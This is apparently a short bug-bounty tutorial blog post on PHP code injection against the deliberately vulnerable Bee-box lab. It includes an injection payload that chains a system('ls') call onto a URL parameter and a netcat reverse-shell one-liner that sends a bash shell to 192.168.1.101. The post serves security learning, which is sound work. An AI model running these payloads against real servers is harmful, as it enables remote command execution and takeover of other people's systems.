Bug Bounty Hunting – PHP Code Injection

PHP Code Injection

PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine.

Tools we will be using

  • Bee-box

Getting started

  • If we click on the message, it echos data back. So we know the PHP code is executing correctly.
  • We can also see this in the URL, with the message parameter.
  • We can change the echo message, however, if we try other data like HTML tags (HTML Injection) we get no output.
  • So we have established that the message is being processed by the server.
  • If we insert a PHP statement terminator (semicolon) we can execute more commands with the PHP system call.
A great way of taking advantage of PHP code injection is by using the system call.
Message=Data;system(“ls”);

Getting a reverse shell

  • Setup a netcat listener – nc -nvlp 1234
  • Execute nc with system call – system(“nc 192.168.1.101 1234 -e /bin/bash”);
Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *